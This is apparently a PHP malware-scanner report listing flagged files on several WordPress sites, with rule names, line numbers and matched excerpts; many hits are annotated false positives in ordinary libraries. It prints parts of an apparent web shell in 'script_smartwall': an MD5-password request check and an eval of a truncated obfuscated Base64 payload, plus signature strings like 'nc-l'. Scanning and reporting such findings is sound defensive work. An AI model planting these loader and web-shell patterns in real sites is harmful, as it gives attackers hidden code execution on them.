//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 13:37:19 Modified: 2020-09-27 13:37:35 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check, a pattern typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 13:37:19 Modified: 2020-09-27 13:37:35 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 13:37:19 Modified: 2020-09-27 13:37:34 Warns: 2 Dangers: 3
| Description | Match |
|---|
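Exploit base64_long Line: 2 Warning Long Base64-encoded text is usually used to obfuscate malicious code. Note: the `eval` finding below shows this same string being decoded and evaluated on line 2, so this file warrants priority review, in isolation and without executing it. |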
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-08-19 15:53:31 Modified: 2020-08-19 15:53:31 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-08-19 15:53:31 Modified: 2020-08-19 15:53:31 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Warns: 1
| Description | Match |
|---|
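Function system Warning Potentially dangerous function `system` [https://www.php.net/system] Note: in the excerpt below the word `system` is followed by a parenthesis inside a translatable help string passed to `__()`, not a call to PHP's `system()`. |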
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 2
| Description | Match |
|---|
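Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. In the excerpt that follows, array_filter() is applied to $allPatterns and $_GET appears only in a later array_key_exists() check, so the excerpt itself does not show request data reaching a callback |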
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 1
| Description | Match |
|---|
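Exploit hacked_by Line: 7576 Dangerous Hacker credits. The phrase can also appear in an ordinary source comment written by a library author, so read line 7576 before treating it as a defacement marker |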
Hacked by
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 5
| Description | Match |
|---|
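Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells that are code-golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]. All four nano hits in this file are calls to option-supplied callbacks keyed by PCLZIP_CB_* constants; comparing the file with a known-good copy of the library shows whether these lines were altered |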
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
| Description | Match |
|---|
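Exploit extract_global Line: 12 Dangerous Code injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request. With extract($_POST), every request parameter becomes a local variable and by default overwrites an existing one of the same name |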
extract($_POST)
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Warns: 3
| Description | Match |
|---|
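Exploit too_many_chr Line: 1071 Warning The `chr` concatenation technique is usually used for the obfuscation of malicious code. The hits on lines 1071–1073 are runs of ascending byte values, which reads more like a lookup table than encoded text; check the surrounding array before treating it as obfuscation |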
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
| Description | Match |
|---|
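Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval]. The match is the four letters `riny` (ROT13 of `eval`), which can also occur inside a longer word or identifier; read line 177 in context |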
riny
|
|
//var/www/omsk/data/www/intim-omsk2.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-10-21 20:25:26 Modified: 2020-10-21 20:25:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
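Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check, typically used on web shells. index.php in this directory carries the same hash, and smartwall.php reports eval() over a long Base64 string, so the three script_smartwall files are best reviewed together |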
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/omsk/data/www/intim-omsk2.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-10-21 20:25:26 Modified: 2020-10-21 20:25:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/omsk/data/www/intim-omsk2.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-10-21 20:25:26 Modified: 2020-10-21 20:25:26 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-includes/PHPMailer/PHPMailer.php Size: 166.60 kB Created: 2021-03-17 21:28:10 Modified: 2021-03-17 21:28:10 Dangers: 1
| Description | Match |
|---|
Sign a408f408 Line: 1791 Dangerous Malware Signature (hash: a408f408) |
cmd.exe
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/class-wp-filesystem-direct.php Size: 16.02 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:25 Warns: 1
| Description | Match |
|---|
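Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid]. This file and the ones listed after it sit under wp-content/wp-admin/includes/, which is not where WordPress core normally keeps its admin files; confirm why the copy exists and compare it with the matching core release |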
posix_getpwuid( $owneruid ); return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $file ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); return $grouparray['name']; } public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ! $overwrite && $this->exists( $destinat...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/class-pclzip.php Size: 191.21 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:22 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2627 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2780 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3702 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3948 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5677 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/file.php Size: 92.41 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:33 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 703 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$overrides['upload_error_handler'](&$file, $message )
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/class-wp-filesystem-ssh2.php Size: 21.21 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:26 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid( $owneruid ); return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); return $grouparray['name']; } public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/class-wp-debug-data.php Size: 43.17 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:25 Warns: 1 Dangers: 3
| Description | Match |
|---|
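Exploit php_uname Line: 553 Dangerous RCE (Remote Code Execution) allows remote attackers to execute arbitrary commands or code on the target machine. php_uname() itself only returns operating-system information; the `exec` excerpt for this same file shows it feeding a sprintf() of the server architecture, so the practical concern at this line is information disclosure unless the file differs from its upstream release |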
php_uname( 'm' )
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec( 'gs --version' ); if ( empty( $gs ) ) { $gs = $not_available; $gs_debug = 'not available'; } else { $gs_debug = $gs; } } else { $gs = __( 'Unable to determine if Ghostscript is installed' ); $gs_debug = 'unknown'; } $info['wp-media']['fields']['ghostscript_version'] = array( 'label' => __( 'Ghostscript version' ), 'value' => $gs, 'debug' => $gs_debug, ); if ( function_exists( 'php_uname' ) ) { $server_architecture = sprintf( '%s %s %s', php_uname( 's' ), php_uname( 'r' ), php_uname( 'm' ) ...
| Sign 471b95ee Line: 653 Dangerous Malware Signature (hash: 471b95ee) |
SUHOSIN
| Sign 471b95ee Line: 654 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/ms.php Size: 33.97 kB Created: 2020-10-29 23:44:39 Modified: 2021-03-31 20:12:36 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 562 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:49:53 Modified: 2021-03-17 22:57:57 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-12-03 18:46:53 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/profile-builder/assets/lib/Mustache/Engine.php Size: 22.10 kB Created: 2020-03-07 13:50:19 Modified: 2021-03-17 22:57:57 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
